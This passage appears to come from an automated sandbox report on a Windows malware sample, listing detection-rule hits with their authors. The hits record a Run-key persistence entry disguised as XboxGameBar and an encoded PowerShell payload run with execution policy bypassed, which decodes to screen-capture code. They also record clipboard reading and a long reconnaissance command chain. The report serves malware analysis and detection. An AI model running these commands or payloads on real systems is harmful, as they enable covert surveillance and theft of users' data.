aAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: cmd.exe /c chcp, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7688, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 892, ProcessName: chcp.com
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ProcessId: 8168, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XboxGameBar
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABF
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\RuntimeusererVers.exe", ParentImage: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, ParentProcessId: 8168, ParentProcessName: RuntimeusererVers.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 6328, ProcessName: cmd.exe
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6088, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 2092, ProcessName: net.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5100, TargetFilename: C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline
                      Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service 